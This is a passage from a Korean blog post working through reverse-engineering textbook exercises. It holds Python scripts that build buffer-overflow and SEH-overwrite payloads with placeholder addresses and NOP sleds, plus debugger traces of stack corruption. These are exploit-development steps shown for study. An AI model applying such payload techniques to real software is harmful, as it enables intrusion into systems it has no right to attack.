5Kk6Kk7Kk8Kk9Kl0Kl1Kl2Kl3Kl4Kl5Kl6Kl7Kl8Kl9Km0Km1Km2Km3Km4Km5Km6Km7Km8Km9Kn0Kn1Kn2Kn3Kn4Kn5Kn6Kn7Kn8Kn9Ko0Ko1Ko2Ko3Ko4Ko5Ko6Ko7Ko8Ko9Kp0Kp1Kp2Kp3Kp4Kp5Kp6Kp7Kp8Kp9Kq0Kq1Kq2Kq3Kq4Kq5Kq6Kq7Kq8Kq9Kr0Kr1Kr2Kr3Kr4Kr5Kr6Kr7Kr8Kr9Ks0Ks1Ks2Ks3Ks4Ks5Ks6Ks7Ks8Ks9Kt0Kt1Kt2Kt3Kt4Kt5Kt6Kt7Kt8Kt9Ku0Ku1Ku2Ku3Ku4Ku5Ku6Ku7Ku8Ku9Kv0Kv1Kv2Kv3Kv4Kv5Kv6Kv7Kv8Kv9Kw0Kw1Kw2Kw3Kw4Kw5Kw6Kw7Kw8Kw9Kx0Kx1Kx2Kx3Kx4Kx5Kx6Kx7Kx8Kx9Ky0Ky1Ky2Ky3Ky4Ky5Ky6Ky7Ky8Ky9Kz0Kz1Kz2Kz3Kz4Kz5Kz6Kz7Kz8Kz9La0La1La2La3La4La5La6La7La8La9Lb0Lb1Lb2Lb3Lb4Lb5Lb6Lb7Lb8Lb9Lc0Lc1Lc2Lc3Lc4Lc5Lc6Lc7Lc8Lc9Ld0Ld1Ld2Ld3Ld4Ld5Ld6Ld7Ld8Ld9Le0Le1Le2Le3Le4Le5Le6Le7Le8Le9Lf0Lf1Lf2Lf3Lf4Lf5Lf6Lf7Lf8Lf9Lg0Lg1Lg2Lg3Lg4Lg5Lg6Lg7Lg8Lg9Lh0Lh1Lh2Lh3Lh4Lh5Lh6Lh7Lh8Lh9Li0Li1Li2Li3Li4Li5Li6Li7Li8Li9Lj0Lj1Lj2Lj3Lj4Lj5Lj6Lj7Lj8Lj9Lk0Lk1Lk2Lk3Lk4Lk5Lk6Lk7Lk8Lk9Ll0Ll1Ll2Ll3Ll4Ll5Ll6Ll7Ll8Ll9Lm0Lm1Lm2Lm3Lm4Lm5Lm6Lm7Lm8Lm9Ln0Ln1Ln2Ln3Ln4Ln5Ln6Ln7Ln8Ln9Lo0Lo1Lo2Lo3Lo4Lo5Lo6Lo7Lo8Lo9Lp0Lp1Lp2Lp3Lp4Lp5Lp6Lp7Lp8Lp9Lq0Lq1Lq2Lq3Lq4Lq5Lq6Lq7Lq8Lq9Lr0Lr1Lr2Lr3Lr4Lr5Lr6Lr7Lr8Lr9Ls0Ls1Ls2Ls3Ls4Ls5Ls6Ls7Ls8Ls9Lt0Lt1Lt2Lt3Lt4Lt5Lt6Lt7Lt8Lt9Lu0Lu1Lu2Lu3Lu4Lu5Lu6Lu7Lu8Lu9Lv0Lv1Lv2Lv3Lv4Lv5Lv6Lv7Lv8Lv9Lw0Lw1Lw2Lw3Lw4Lw5Lw6Lw7Lw8Lw9Lx0Lx1Lx2Lx3Lx4Lx5Lx6Lx7Lx8Lx9Ly0Ly1Ly2Ly3Ly4Ly5Ly6Ly7Ly8Ly9Lz0Lz1Lz2Lz3Lz4Lz5Lz6Lz7Lz8Lz9Ma0Ma1Ma2Ma3Ma4Ma5Ma6Ma7Ma8Ma9Mb0Mb1Mb2Mb3Mb4Mb5Mb6Mb7Mb8Mb9Mc0Mc1Mc2Mc3Mc4Mc5Mc6Mc7Mc8Mc9Md0Md1Md2Md3Md4Md5Md6Md7Md8Md9Me0Me1Me2Me3Me4Me5Me6Me7Me8Me9Mf0Mf1Mf2Mf3Mf4Mf5Mf6Mf7Mf8Mf9Mg0Mg1Mg2Mg3Mg4Mg5Mg6Mg7Mg8Mg9Mh0Mh1Mh2Mh3Mh4Mh5Mh6Mh7Mh8Mh9Mi0Mi1Mi2Mi3Mi4Mi5Mi6Mi7Mi8Mi9Mj0Mj1Mj2Mj3Mj4Mj5Mj6Mj7Mj8Mj9Mk0Mk1Mk2Mk3Mk4Mk5Mk6Mk7Mk8Mk9Ml0Ml1Ml2Ml3Ml4Ml5Ml6Ml7Ml8Ml9Mm0Mm1Mm2Mm3Mm4Mm5Mm6Mm7Mm8Mm9Mn0Mn1Mn2Mn3Mn4Mn5Mn6Mn7Mn8Mn9Mo0Mo1Mo2Mo3Mo4Mo5Mo6Mo7Mo8Mo9Mp0Mp1Mp2Mp3Mp4Mp5Mp6Mp7Mp8Mp9Mq0Mq1Mq2Mq3Mq4Mq5Mq6Mq7Mq8Mq9Mr0Mr1Mr2Mr3Mr4Mr5Mr6Mr7Mr8Mr9Ms0Ms1Ms2Ms3Ms4Ms5Ms6Ms7Ms8Ms9Mt0Mt1Mt2Mt3Mt4Mt5Mt6Mt7Mt8Mt9Mu0Mu1Mu2Mu3Mu4Mu5Mu6Mu7Mu8Mu9Mv0Mv1Mv2M"

change_esp = struct.pack('<L',0xAABBCCDD) #4byte

#seh

seh_next = struct.pack('<L',0xFFFFFF)

seh_handler = struct.pack('<L',0xAABBCCDD)

payload = "A"*(72-4) + seh_next + seh_handler + "\x90"*100

f = open('exploit.txt','wb')

f.write(payload)

f.close()

음.. SEH_HANDLER 굳이 신경 안쓰고도 가능하구나.. 참 포너블은 어렵다 진짜 과제 하는 기분이다 ㅋㅋ

BUF를 덮은 그 것만 생각하자 .

두 번째 시나리오. seh_handler로 사용하려는 값을 A*16 뒤에 넣자

#!python

import struct

change_esp = struct.pack('<L',0xAABBCCDD) #4byte

#seh

seh_next = struct.pack('<L',0xFFFFFF)

seh_handler = struct.pack('<L',0xAABBCCDD)

payload = "A"*(16) + seh_handler + "\x90"*100

#payload = "A"*100000

f = open('exploit.txt','wb')

f.write(payload)

f.close()

지금 NOP을 줘놓은 이유는 seh_handler의 주소를 알게 되면 jmp로도 이용할 수 있을 것 같아서 넣어두었다. (사실상.. 버퍼 크기가 넘나 작아서..) 되려나 ㅎㅎ

뭐야?? 아까 분명... buf에 상관있었는데 지금은 또 왜 seh_handler에 상관이 있는거지.... 눈물이 난다 ㅠㅠ (사실 진짜 눈물은 이정도로 나진 않는다ㅋㅋ)

다시 코드 짜자 익스플로잇... 시행착오 많이 겪게 하는건 다음에 잘하기 위해서라고 생각하고 !

\x00 때문인 것으로 밝혀졌다. 왜 그런진 모르겠다만..

보통 strlen 함수를 사용하게 될 시 \0을 만나게 되면 그 이후의 값은 전부 \0로 치부하고 0x00으로 덮어버리긴

그리고 제일 큰 실수 !!

매일 SEH Handler 하다보니 자연스레 (x-4)를 계속 하고 있었다. 으휴.. 일반 적인 buf는 sfp까지 덮었을 때 eip가 조작되기 때문에 20바이트에서 패턴이 발견 되었다면 payload = "A"*20 + 원하는 값을 했으면 됬다.

#!python

import struct

pattern = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2이하생략"

change_esp = struct.pack('<L',0xAABBCCDD) #4byte

#seh

seh_next = struct.pack('<L',0xFFFFFF)

seh_handler = struct.pack('<L',0xAABBCCDD)

payload = "A"*(20)+ seh_handler + "\x90"*100

f = open('exploit.txt','wb')

f.write(payload)

f.close()

하나 해결 !!

적어도 2가지를 제시하라고 했으니, 이번엔 위에거랑 다르게 엄청 쉽게 해보려고 한다.

MOV EAX, 0xAABBCCDD

CALL EAX

MOV EAX, 0xAABBCCDD

push EAX

retn

MOV EAX, 0xAABBCCDD

jmp EAX

ㅎㅎㅎㅎ 허무하지 않는가.. ^^;;

하나 하나 PoC 해보장

잠시 쉬었다가 계속 풀자.

3번. 예제 함수 addme 에서 RET를 실행하기 전에 스택포인터가 올바르게 복구 되지 않으면 무슨 일이 벌어질까?

실습을 하기 전에 추측을 한번 해보았다.

(맞기를 바라며..)

리눅스 힙에서 fastbin이라는 영역이 있는데 a , b, c에 각각 8바이트 할당한 정수형 포인터가 있다고 가정하자. a를 해제하고 또 다시 a를 해제하려고 하면 해제를 할 수가 없다.

free를 하게 되면 freelist가 생성이 되는데 a가 freelist의 top에 위치 하게 된다.

하지만, b를 해제하게 되면 top은 b가 되기 때문에 a는 또 한번 해제 될 수 있는 권한을 가지게 된다. 이 예시를 예로 든 이유는 "규칙"을 어겼을 때 터지는 예외처리에 대해 한번 더 생각해보는 시간을 가지기 위해서이다.

본론으로 돌아와서 예제 함수 addme에서 RET를 실행하기 전에 스택포인터가 올바르게 복구 되지 않으면 어떻게 되는지에 대해 생각하고 코드를 작성하여 실습을 진행해볼까 한다.

우선 addme 함수를 보자.

int __cdecl addme(short a, short b)

{

return a+b;

}

책에 있는 addme함수는 지나치게 간단한 구조를 지니고 있다.

스택 포인터를 올바르게 복구 하지 않는다. 이 말은 프롤로그는 존재하지만 에필로그는 깨져있다고 봐도 무방하지 않을까?

우선 저 함수와 메인함수를 간단하게 만들어서 디버깅을 통해 디어셈블리 코드를 들여다 보자.

#include <stdio.h>

int __cdecl addme(short a, short b)

{

return a + b;

}

int main()

{

int sum = 0;

sum = addme(3, 5);

printf("End\n");

return 0;

}

sum = addme(3, 5);

00841895 6A 05 push 5 // 2번째 매개변수

00841897 6A 03 push 3 // 1번째 매개변수

00841899 E8 E1 FA FF FF call addme (084137Fh)

함수에 매개변수를 사용하려면 push 명령어를 이용한다

int __cdecl addme(short a, short b)

{

00841730 55 push ebp

00841731 8B EC mov ebp,esp

00841733 81 EC C0 00 00 00 sub esp,0C0h

00841739 53 push ebx

0084173A 56 push esi

0084173B 57 push edi

0084173C 8D BD 40 FF FF FF lea edi,[ebp-0C0h]

00841742 B9 30 00 00 00 mov ecx,30h

#include <stdio.h>

int __cdecl addme(short a, short b)

{

00841747 B8 CC CC CC CC mov eax,0CCCCCCCCh

0084174C F3 AB rep stos dword ptr es:[edi]

return a + b;

0084174E 0F BF 45 08 movsx eax,word ptr [a]

00841752 0F BF 4D 0C movsx ecx,word ptr [b]

00841756 03 C1 add eax,ecx

}

00841758 5F pop edi

00841759 5E pop esi

0084175A 5B pop ebx

0084175B 8B E5 mov esp,ebp

0084175D 5D pop ebp

0084175E C3 ret

# Debug 모드

얘내들이 정리가 되지 않는다고 봐야 하지 않을까 한다.

00841758 5F pop edi

00841759 5E pop esi

0084175A 5B pop ebx

0084175B 8B E5 mov esp,ebp

0084175D 5D pop ebp

addme:

00821080 55 push ebp

00821081 8B EC mov ebp,esp

00821083 0F BF 45 08 movsx eax,word ptr [a]

00821087 0F BF 4D 0C movsx ecx,word ptr [b]

0082108B 03 C1 add eax,ecx

0082108D 5D pop ebp

0082108E C3 ret

# Release 모드

음 릴리즈모드로 넘어오니 소스코드가 급격하게 정리되었다. 디버그모드와 릴리즈모드에 대한 설명은 생략하겠다.

pop ebp를 빼버리면 ebp가 복구가 되지 않겠지? nop 처리 해보자~

어셈 본 김에 재밌게 복습 들어가자.

함수에서 리턴 되는 값이 eax인 이유 !

00FF1080 >/$ 55 push ebp

00FF1081 |. 8BEC mov ebp,esp

00FF1083 |. 0FBF45 08 movsx eax,word ptr [ebp+0x8]

00FF1087 |. 0FBF4D 0C movsx ecx,word ptr [ebp+0xC]

00FF108B |. 03C1 add eax,ecx // 요기 !! eax와 ecx의 값을 더해서 eax에 대입하기 때문이다

00FF108D |. 5D pop ebp

00FF108E \. C3 retn

# 함수가 리턴 될 때 가지고 오는 레지스터는 ? EAX

올바르게 복구 되면 가게 되는 주소

00FF10A4 |. 83C4 08 add esp,0x8 # main+14 주소

006FFA08 00FF10A4 RETURN to Project1.main+14 from Project1.addme

자 그럼 pop ebp를 놉 해보자

00FF1080 >/$ 55 push ebp

00FF1081 |. 8BEC mov ebp,esp

00FF1083 |. 0FBF45 08 movsx eax,word ptr [ebp+0x8]

00FF1087 |. 0FBF4D 0C movsx ecx,word ptr [ebp+0xC]

00FF108B |. 03C1 add eax,ecx

00FF108D 90 nop

00FF108E \. C3 retn

# 과연.. 어떻게 될까요?

이상한 주소로 점프 되었어요...

음 정확히 이걸 뭐라고 설명해야할까..

확실한 것은 ebp가 사라지면서 즉, pop을 못하게 되면서 복구를 할 수 없게 되어 정확한 주소로 return이 되지 않았다는 것..

스택을 직접 보면 알 수 있을 것 같다 ~

00FF1080 >/$ 55 push ebp

00FF1081 |. 8BEC mov ebp,esp

00FF1083 |. 0FBF45 08 movsx eax,word ptr [ebp+0x8]

00FF1087 |. 0FBF4D 0C movsx ecx,word ptr [ebp+0xC]

00FF108B |. 03C1 add eax,ecx

00FF108D 5D pop ebp

00FF108E \. C3 retn

push ebp 되고 나면 벌어지는 상황

00EFF798 /00EFF7AC ASCII "體? # push ebp

00EFF79C |00FF10A4 RETURN to Project1.main+14 from Project1.addme # main으로 복귀 하기 위한 스택 주소

main으로 복귀 하기 위한 스택의 주소 보다 -4바이트 위치에 ebp를 넣게 된다.

EAX 030AAF40

ECX 00000000

EDX 00000000

EBX 00D50000

ESP 00EFF798 ASCII "??

EBP 00EFF7AC ASCII "體?

ESI 745080E8 ucrtbase.745080E8

EDI 030A9918

EIP 00FF1081 Project1.00FF1081

C 0 ES 002B 32bit 0(FFFFFFFF)

P 0 CS 0023 32bit 0(FFFFFFFF)

A 0 SS 002B 32bit 0(FFFFFFFF)

Z 0 DS 002B 32bit 0(FFFFFFFF)

S 0 FS 0053 32bit D53000(FFF)

T 0 GS 002B 32bit 0(FFFFFFFF)

D 0

O 0 LastErr ERROR_SUCCESS (00000000)

EFL 00000202 (NO,NB,NE,A,NS,PO,GE,G)

ST0 empty 0.0

ST1 empty 0.0

ST2 empty 0.0

ST3 empty 0.0

ST4 empty 0.0

ST5 empty 0.0

ST6 empty 0.0

ST7 empty 0.0

3 2 1 0 E S P U O Z D I

FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)

FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1

00FF1080 >/$ 55 push ebp

00FF1081 |. 8BEC mov ebp,esp # 원래 ESP가 00EFF798 였는데 이를 ebp에 복사시킨다.

00FF1083 |. 0FBF45 08 movsx eax,word ptr [ebp+0x8]

00FF1087 |. 0FBF4D 0C movsx ecx,word ptr [ebp+0xC]

00FF108B |. 03C1 add eax,ecx

00FF108D 5D pop ebp

00FF108E \. C3 retn

EAX 030AAF40

ECX 00000000

EDX 00000000

EBX 00D50000

ESP 00EFF798 ASCII "??

EBP 00EFF798 ASCII "??

ESI 745080E8 ucrtbase.745080E8

EDI 030A9918

EIP 00FF1083 Project1.00FF1083

C 0 ES 002B 32bit 0(FFFFFFFF)

P 0 CS 0023 32bit 0(FFFFFFFF)

A 0 SS 002B 32bit 0(FFFFFFFF)

Z 0 DS 002B 32bit 0(FFFFFFFF)

S 0 FS 0053 32bit D53000(FFF)

T 0 GS 002B 32bit 0(FFFFFFFF)

D 0

O 0 LastErr ERROR_SUCCESS (00000000)

EFL 00000202 (NO,NB,NE,A,NS,PO,GE,G)

ST0 empty 0.0

ST1 empty 0.0

ST2 empty 0.0

ST3 empty 0.0

ST4 empty 0.0

ST5 empty 0.0

ST6 empty 0.0

ST7 empty 0.0

3 2 1 0 E S P U O Z D I

FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)

FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1

00EFF7A0 |00000003 # ebp+0x8 (첫번째 매개변수)

00EFF7A4 |00000005 # ebp+0xC (두번째 매개변수)

주의 ! 5값이 먼저 스택에 쌓였다는 사실 !! Do you know LIFO?

00FF1083 |. 0FBF45 08 movsx eax,word ptr [ebp+0x8] // EAX = 3

00FF1087 |. 0FBF4D 0C movsx ecx,word ptr [ebp+0xC] // ECX = 5

00EFF798 /00EFF7AC ASCII "體? # push ebp ->이제 이놈이 POP이 되면 스택에서 빠져나가고 레지스터에 EBP가 복구

00EFF79C |00FF10A4 RETURN to Project1.main+14 from Project1.addme # main으로 복귀 하기 위한 스택 주소

즉,

| push ebp

| Return main+14

|------------

였는데

스택은 LIFO이니까 위엣놈 이 빠져 나가면 이제 Return main+14가 복구 될 수 있는 찬스를 얻게 된다.

근데!! 아까 처럼 nop해버리면 00EFF7AC가 스택에 고대로 머물게 되고 그럼 우리는 00EFF7AC를 호출하게 되는 것이다

.정상적인 루틴

| ##사라짐##

| Return main+14 <- 얘가 복구 될 차례

|------------

주소 0xFF108D에 nop이 되어 있어서 스택의 008FFD48안의 주소 0x008FFD5C는 복구 되지 못하였다.

예상대로 0x008FFD5C로 가서 올바른 행위를 하지 못하게 되었다 ~ 끝~

4번. 설명한 호출 규약 모두 반환 값은 32비트 레지스터 (EAX)에 저장된다고 한다.

이때, 반환 값이 32비트 레지스터 안에 들어가지 않으면 !! 무슨 일이 벌어질까?

이런 상황을 실험하고 검증할 수 있는 프로그램을 작성해보자. 또한 이런 메커니즘은 컴파일러에 따라 다를 것인지 생각해보자.

일단. 전역변수를 이용해서 구성해봤는데 잘 돌아간다.

#pragma warning(disable:4716) //no return value

#include <stdio.h>

#include <string.h>

static int hap = 0;

static int a = 5;

static int b = 6;

char format[] = "hap = %d \n";

__declspec(naked) int sum(int a, int b)

{

__asm {

push ebp

mov ebp, esp

push eax

push ecx

xor eax, eax

xor ecx, ecx

pop ecx

pop eax

add eax, edx

push eax

push edx

mov hap, eax

xor eax, eax

xor ecx, ecx

pop edx

pop eax

pop ebp

retn

}

/// esp+8로 스택 정리 (main 함수 스택)

__declspec(naked) int main(int argc, char *argv[])

{

__asm {

push ebp

mov ebp, esp

sub esp, 0x8

movzx eax, [a]

movzx edx, [b]

push edx

push eax

call sum

add esp,0x8

mov eax, hap

push eax

mov eax, offset format

push eax

call printf

add esp, 8

xor eax, eax

mov esp, ebp

pop ebp

retn

}

저작자표시

'0x03 Reversing Theory > 역공학 연습문제' 카테고리의 다른 글

p. 38 (0)	2018.01.22
chapter 1. 걸어서 통과하기 (0)	2018.01.22
주저리주저리 (0)	2018.01.21

cyber security

cyber security

태그

최근글

댓글

공지사항

아카이브

'0x03 Reversing Theory > 역공학 연습문제' 카테고리의 다른 글

관련글

티스토리툴바